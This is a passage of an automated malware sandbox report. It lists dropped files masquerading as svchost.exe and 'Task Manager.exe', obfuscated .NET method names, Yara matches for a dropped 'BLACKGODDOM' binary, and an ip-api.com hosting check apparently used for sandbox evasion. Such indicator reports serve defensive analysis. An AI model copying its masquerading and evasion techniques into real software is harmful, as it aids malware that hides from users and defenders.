                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csHigh entropy of concatenated method names: 'oE4BLKkOJwJkhBs65QJpSDo8Md5CDAuZjc4WUEcxAfIOG23UBIaTCapleYZUKnLiMkbPMXxOI7PKPu2j9h3', 'N9oUI9mYXALciZoMZLlVV0tmvGYoUbkCuVuGZnI6tt3jqiR1CaAJvjbbU1vOTBGRVA80M0NW161PHQPFBWn', 'aUJok4hcYvsDPNQPmoAXSl6x3U0NEPPoLVH2cbndji0p9jfmIdDCSDse3HJZDg8oKnZJ3HFvPyo44QdL8Kw', 'R9VTw5Ow3ZrUixgXN4ty3GtrMHbKL0Qowe6VrLGgHXXnAQ80DTplv6LxWtYNmXENyTVP3JtltPNtVHkZXX3', 'j0zQrveLMiqSu7zMH9Our65UmlUYlqoBubCZOWDuamjeD6KqqAFMPJ95TCoWZLGCvyeeRlcP3hh59v4freS', '_8L5CgH0C23VRbMthP7Jf7kSrJ9glQcqMYhryJARUsflrpbpE4tjHVATY8vkfZcNwLTIzxmF6MNwHabAbKk0', 'zjteIiYZBCEUIfZALIIk3d7hDv65uKfuC8nAEC1T1CBPTBINCMoVJ4RLQAiyO7ZsVxkVDitgTfckEJSNLPx', 'cMcUuo0NeXcTC220n6asyoSddKOoINnXTXV9AqWmQcDlAwC8WzEdAqYNoZUoS745k2J4j', 'uxa5ikT1ZUIZdE6i6ERAWl1k81qclTsBai1NJ4agQeOPiM4PejGIEKTD5mIId5kNWkrjT', 'Y3bSF2JcUm79bs6HNJfk1SrdYfsj8C9B0hXA1iccUgOPOqUEtaRaOQKBDqT3LCBSy2tba'
                        Source: Task Manager.exe.2.dr, Fb4m7RJe0Qv.csHigh entropy of concatenated method names: 'hjHzm4Pfyt5', 'ZKRYmVy2Pv1', 'rp5q1rsDuD4', 'TLmoWdZk4gJ8qlxtTzfYgkPF00H0sBWArm8lExQOZQr8Zy', 'gJFZJlJrWXFSvau2STYju30ORJ4DKuWMdIzOajpy5UUwoe', 'bvVp302JnxSq8md2X5Dnci6nA5TdvoCeH66yUEwX2B9CGMitUJ0ONBXHwI12lzkGiMvTeRuL6SJM5X', 'SwBiJs8rzz86BTFzuyi982qmNZ46ZcmO1PYSjfx7nU8A2hzP3DGZLA9iur0xGZwjqEEryNQLfBFVR6', 'Vu4aKnlkz1RqTlm5Bpqmx0vm41aTKADkKvDmkJ15HWphvBFWDi6gfKrkhYKLBGfzDpV8qjWyWoxX82', 'nVhPHaUcERABlTlnWEc5R21lzCatKHxQV1fYhhbaCR8AUZAp8cjnCdgkX9RIC3FxY8brpAkrs0nYAG', '_3uUG9xmKVKB0MjaBorJ8D81X3ZyeUH1z11kXwxl5UJnO1nqZM2zUk9fjhSl9KMRsxVPuERr5VIlUvm'
                        Source: Task Manager.exe.2.dr, nDwO6BynlAqZFkwwCrH6PHnMDKRT6I6AlLjf.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'KMATUiWYcLiKK8JvGZLFrauR60FwMfdZaXaJ6qpPN70T1xH08dp33rXKYqhjoWD7F24Evj8Ez7wwdRko2gO7c5', 'v9oqCZE3V8qhw1zgvo5HkJV8eRSi', 'c8htM59CZqtZreHywCACSb3iUx4I', 'T4PJNo2lxTWYM5W64SERny35ZTfu'
                        Source: Task Manager.exe.2.dr, dIQI3NYLguO.csHigh entropy of concatenated method names: '_1TUjl1yTF2P', 'oOOMGaeCsXN', '_6fsMrvJ0bLK', 'nLUzlYPcLGh', 'iE7H0Y2RqRu', 'Ae8dXrsR6eZ', 'Y7T3WA7JVpW', 'kkFOZQP9LNE', 'TAqg7ZBLQ0u', 'bgWTYmHjvn2'
                        Source: Task Manager.exe.2.dr, N4qv0P7NqA5lLmrpfCCEcg1bUhKkgDxW8ewFoS8VR7VFHhwHxHJH30V8zwyd8nWLVrg2.csHigh entropy of concatenated method names: 'DoMJLrELpQF4kFNB0F2SzJ1FaHYAi6IrR5456rZ4BPQoYNepejTjw2zju9TGoGvUJ2Wa', 'YfKbxaacUyLm8kXroJQdpZ1F24wHvAN04faspdjbxGd374vXpOFIgnZQurKjV0QRTpln', 'NwvuBUlOOBocUbQj0QMiCKKTMAakL5m4h1Pmt7YfMHNuZKLlaY1iVt6TcPRaj3Ji2NOz', 'DGGBKWl4dTZEx5CiDVdFVD7CVjAgP074v8B0arH0wBJ9flQwhWK4bUZLRGpe0HJ941DJ', 'txv5K3hULC9xdl1tqKArHalMJPZS2ozVn5zMo21GUCdewvcEF03GEslXIv5b1kaTrqDL', 'Nm6ZEDurG88dfYm8KN5FW0FYqapgoO3ItRqJtSdntWUVcpzItNabV9UxNmHeMgx0ml7t', 'rDpxrqsuziO8bnUQkFVb2MJFwF6zIeNItjm3DnHSuOXvvIRBsRwKhEBZKum02HIaUX1E', 'zazUa0bRl6zjQ5YI9hAwE2ZO0RaHKsVNaU6Fsj4gz7Xfpxeru5TVYLZuQKkgEAoQxxIQ', 'dFsvjRDCYGISAmhuipQSXU0Zg7jMzL7YDwKY9vqN1l1icXi00PrHCQnk3Lt9S4RpvmRC', 'E4xcB5DlPKy'
                        Source: Task Manager.exe.2.dr, 2syffmJ1FUx.csHigh entropy of concatenated method names: 'RCgI0QPFSdl', 'rpSmmtLxQYb', 'koLYQu9EV1S', 'T62a3hNbfsL', '_6fH79MZnGpY', '_9iq9wD0Tf7f', 'CaFVmdLghdY', 'gA6uv1tr8t0', 'tQHrqPhYyD7', 'HIw61xlgmjQ'
                        Source: Task Manager.exe.2.dr, DPEF9ZxDQwL.csHigh entropy of concatenated method names: 'oGKOL3iQ4xp', 'bo83QMMPxOG', 'XORqQdkcJon', 'AJmeDY4PP6q', '_756IyhxiumA', 'mXN9y5ZR179', 'cXg73EliikJ', 'kPjOwnT9Boq', 'ZnIfdmtxVY5', 'EIzDG51TZUR'
                        Source: Task Manager.exe.2.dr, vGttXPsprPl.csHigh entropy of concatenated method names: 'R4QXIaZ2ndo', 'znWLPNKRCJq', '_3QQ8Uy8irTD', 'gU7f7uOpv2C', 'q3wcOQu4bDWK1VT79IJ4rmrnKzJkvbMfTvf02jIt7cK6Lcymm7yZuOj734GM', 'aHLFcJ9ls4nA5iMBvgrqa1GU0Gza7qz2PoismJa7Umc7E4LOLH5ViDcFSuGb', 'ASyMXup4lSaDRSAmgY1mJb7zfm41let6mYBnU6wvB80SWuztpSnmEVJd0xrd', 'Dam22eNwJ5cMO2u9PdB5pJRy6K4b13gaukpjGqNIidlOf9eZkZs5Bslgh3es', 'o8hcspxHqsSgU0EZIM4hQTqsUXxxeeb45VA3yY4uerWRg5mK4yh6qH8IgEby', 'rraPFaDnOL7v16gHHKPocJa55M87TSUmM6QAjiYzlugYSq'
                        Source: Task Manager.exe.2.dr, 775FRTYl17K.csHigh entropy of concatenated method names: 'tNkLUOUXFRI', 'RzlrCku5r1kvGldkvVcJjNqQHdkswbAW711i7fTVBlvkuJ', '_8ndIQtd49Q02IkEktJdSlAXm8a94rgVQeZBkPQ54r6Yis0', 'M6OYZvHBMRn1748kJi4vmK1yn3GsiEmE2fe0GrB2mhJdIE', 'rTxgQw0Kd3agGxctM1GlZeg51QYCZEpIz2FzY6fC5yHwo2'
                        Source: Task Manager.exe.2.dr, bFPtK0txY2P.csHigh entropy of concatenated method names: 'vDhoLRx1yBB', 'PJzNRzn04zALdsQD2LL42Dh6edVq', 'jqKisptso54xa0FP31udMcbjJl3OKl7tKyQJbkpcRzq6llDIl3JjNQP3PRqi', 'y5ItxXCmB4OIwUGCpO8IVuxF8MUVq6G44qNTJpTnuZEFqo1QzGzx3XEbKNOr', 'gz0CJ1jHfufWHBoP2NzuAcyvefbh2VzVxflMfB2mufvIkHSBylONcET4uxrd'
                        Source: Task Manager.exe.2.dr, xOmJpehc6ZQ.csHigh entropy of concatenated method names: 'gsxDanNrMHb', 'rWcTSiKeMZI', 'bwQt3hA2Q4y', 'UMICaIhERl1', 'htV76t8gnUV', 'Kj93YdEXAtd', 'BoopK1ISvq2', '_03nazhDhW2Q', 'HN2Tu8HK1Nb', '_5WBJwHLxizi'

                        Persistence and Installation Behavior

                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exe File created: C:\Users\user\AppData\Roaming\svchost.exe
                        Source: C:\Users\user\AppData\Roaming\All function.cmd File created: C:\Users\user\AppData\Roaming\Task Manager.exe
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exe File created: C:\Users\user\AppData\Roaming\All function.cmd
                        Source: C:\Users\user\AppData\Roaming\All function.exe File created: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe
                        Source: C:\Users\user\AppData\Roaming\All function.cmd File created: C:\Users\user\AppData\Roaming\All function.exe
                        Source: C:\Users\user\AppData\Roaming\All function.exe File created: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe

                        Boot Survival

                        Source: Yara match; file source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
                        Source: Yara match; file source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE
                        Source: Yara match; file source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; file source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara match; file source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; file source: Process Memory Space: All function.exe PID: 1472, type: MEMORYSTR
                        Source: Yara match; file source: Process Memory Space: BLACKGODDOM V.2 GOD BY LA.exe PID: 5492, type: MEMORYSTR
                        Source: Yara match; file source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\All function.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: Yara matchFile source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: All function.exe PID: 1472, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BLACKGODDOM V.2 GOD BY LA.exe PID: 5492, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
